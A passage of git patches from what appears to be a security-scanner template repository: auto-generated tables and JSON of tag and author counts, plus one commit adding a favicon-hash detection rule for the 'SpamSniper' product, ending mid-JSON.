| | | | | +| httpd | 2 | idealphase | 1 | | | | | | | +| cve2008 | 2 | c3l3si4n | 1 | | | | | | | +| showdoc | 2 | dogasantos | 1 | | | | | | | +| sonicwall | 2 | chron0x | 1 | | | | | | | +| glassfish | 2 | yashanand155 | 1 | | | | | | | +| yapi | 2 | kurohost | 1 | | | | | | | +| service | 2 | j33n1k4 | 1 | | | | | | | +| voipmonitor | 2 | ilovebinbash | 1 | | | | | | | +| rockethchat | 2 | its0x08 | 1 | | | | | | | +| ecology | 2 | yavolo | 1 | | | | | | | +| prometheus | 2 | jeya seelan | 1 | | | | | | | +| ucmdb | 2 | ringo | 1 | | | | | | | +| chamilo | 2 | luci | 1 | | | | | | | +| seeyon | 2 | ldionmarcil | 1 | | | | | | | +| natshell | 2 | _generic_human_ | 1 | | | | | | | +| zabbix | 2 | kareemse1im | 1 | | | | | | | +| bigip | 2 | abison_binoy | 1 | | | | | | | +| kibana | 2 | _c0wb0y_ | 1 | | | | | | | +| xxljob | 2 | r3naissance | 1 | | | | | | | +| frp | 2 | koti2 | 1 | | | | | | | +| kentico | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| zhiyuan | 2 | luskabol | 1 | | | | | | | +| icewarp | 2 | kabirsuda | 1 | | | | | | | +| jboss | 2 | shreyapohekar | 1 | | | | | | | +| saltstack | 2 | kba@sogeti_esec | 1 | | | | | | | +| wordfence | 2 | bing0o | 1 | | | | | | | +| huawei | 2 | shifacyclewla | 1 | | | | | | | +| microsoft | 2 | 0xrod | 1 | | | | | | | +| maian | 2 | mubassirpatel | 1 | | | | | | | +| zcms | 1 | thezakman | 1 | | | | | | | +| cgi | 1 | akash.c | 1 | | | | | | | +| 2014 | 1 | alph4byt3 | 1 | | | | | | | +| kafdrop | 1 | kishore krishna (sillydaddy) | 1 | | | | | | | +| apiman | 1 | mhdsamx | 1 | | | | | | | +| bolt | 1 | nytr0gen | 1 | | | | | | | +| openstack | 1 | notsoevilweasel | 1 | | | | | | | +| tapestry | 1 | flag007 | 1 | | | | | | | +| wildfly | 1 | omarkurt | 1 | | | | | | | +| lancom | 1 | sshell | 1 | | | | | | | +| socomec | 1 | elmahdi | 1 | | | | | | | +| webui | 1 | ratnadip gajbhiye | 1 | | | | | | | +| calendarix | 1 | tirtha_mandal | 1 | | | | | | | +| mongoshake | 1 | berkdusunur | 1 | | | | | | | +| discord | 1 | noamrathaus | 1 | | | | | | | +| robomongo | 1 | rtcms | 1 | | | | | | | +| rdp | 1 | whynotke | 1 | | | | | | | +| wooyun | 1 | zandros0 | 1 | | | | | | | +| nette | 1 | affix | 1 | | | | | | | +| csod | 1 | vzamanillo | 1 | | | | | | | +| redis | 1 | rodnt | 1 | | | | | | | +| zm | 1 | becivells | 1 | | | | | | | | spectracom | 1 | | | | | | | | | -| wifisky | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| subrion | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| cve2010 | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| spring | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| status | 1 | | | | | | | | | -| yii | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| wuzhicms | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| javamelody | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| liferay | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| ssltls | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| harbor | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | | plc | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| hadoop | 1 | | | | | | | | | -| cve2007 | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| rfi | 1 | | | | | | | | | -| igs | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| adminer | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| bruteforce | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| akamai | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | | mdb | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| dlogin | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| cve2005 | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| horde | 1 | | | | | | | | | | octobercms | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| igs | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | | opensns | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| htmli | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| netsweeper | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| dlogin | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| axis | 1 | | | | | | | | | +| yii | 1 | | | | | | | | | +| cve2007 | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| kong | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| cve2010 | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| hasura | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| backdoor | 1 | | | | | | | | | +| mcafee | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | | ruby | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| jsf | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| grav | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| azure | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| itop | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| flash | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| linkerd | 1 | | | | | | | | | | yachtcontrol | 1 | | | | | | | | | +| targa | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| npm | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| firebase | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| node | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| harbor | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| wso2 | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| zimbra | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| netis | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| ec2 | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| exchange | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| status | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| favicon | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| symfony | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | | wp-theme | 1 | | | | | | | | | | rujjie | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| concrete | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| db | 1 | | | | | | | | | -| linkerd | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| firebase | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| netsweeper | 1 | | | | | | | | | -| wso2 | 1 | | | | | | | | | -| 2014 | 1 | | | | | | | | | -| codeigniter | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| zzzcms | 1 | | | | | | | | | -| node | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| ilo4 | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| backdoor | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| itop | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| sitecore | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| exchange | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| acme | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| proftpd | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| kong | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| azure | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| powercreator | 1 | | | | | | | | | -| symfony | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| circontrorl | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| netis | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| monitorix | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| cve2005 | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| npm | 1 | | | | | | | | | -| targa | 1 | | | | | | | | | -| blind | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| xff | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| jsf | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| zend | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| erp-nc | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| bash | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| favicon | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | +| liferay | 1 | | | | | | | | | | rsyncd | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| zimbra | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| selea | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| csrf | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| hasura | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| ec2 | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | | k8s | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| druid | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| jnoj | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| mcafee | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| grav | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| flash | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | | expn | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | From f32303958775590a0fea0157a25eb8955e1d3bfe Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Tue, 20 Jul 2021 08:51:14 +0900 Subject: [PATCH 0915/4083] Update favicon-detection.yaml --- technologies/favicon-detection.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml index 1a180e71b7..1110dbd233 100644 --- a/technologies/favicon-detection.yaml +++ b/technologies/favicon-detection.yaml @@ -2032,3 +2032,7 @@ requests: name: "OpenSNS" dsl: - "status_code==200 && (\"1167011145\" == mmh3(base64_py(body)))" + - type: dsl + name: "SpamSniper" + dsl: + - "status_code==200 && (\"-1000719429\" == mmh3(base64_py(body)))" From 10e3400dd47ba35ca28c576ee4b600d3cbb72113 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 19 Jul 2021 23:52:03 +0000 Subject: [PATCH 0916/4083] Auto Generated Templates Stats [Mon Jul 19 23:52:03 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1120 +++++++++++++++++++++--------------------- 2 files changed, 561 insertions(+), 561 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index e29c8178d0..b94a7bfe39 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":464},{"name":"panel","count":201},{"name":"xss","count":168},{"name":"wordpress","count":165},{"name":"rce","count":161},{"name":"exposure","count":154},{"name":"cve2020","count":135},{"name":"lfi","count":127},{"name":"wp-plugin","count":110},{"name":"cve2019","count":82},{"name":"config","count":81},{"name":"tech","count":72},{"name":"cve2021","count":71},{"name":"takeover","count":71},{"name":"token","count":63},{"name":"cve2018","count":62},{"name":"apache","count":60},{"name":"default-login","count":45},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":39},{"name":"iot","count":33},{"name":"network","count":32},{"name":"sqli","count":29},{"name":"oracle","count":29},{"name":"workflow","count":28},{"name":"misc","count":27},{"name":"atlassian","count":26},{"name":"jira","count":25},{"name":"ssrf","count":25},{"name":"oob","count":24},{"name":"logs","count":24},{"name":"disclosure","count":24},{"name":"redirect","count":20},{"name":"aem","count":18},{"name":"cisco","count":15},{"name":"listing","count":15},{"name":"cve2016","count":14},{"name":"sap","count":14},{"name":"debug","count":13},{"name":"cve2015","count":13},{"name":"fuzz","count":13},{"name":"misconfig","count":13},{"name":"struts","count":13},{"name":"weblogic","count":12},{"name":"android","count":12},{"name":"auth-bypass","count":11},{"name":"zoho","count":11},{"name":"dns","count":11},{"name":"springboot","count":11},{"name":"devops","count":10},{"name":"cve2011","count":10},{"name":"magento","count":9},{"name":"jenkins","count":9},{"n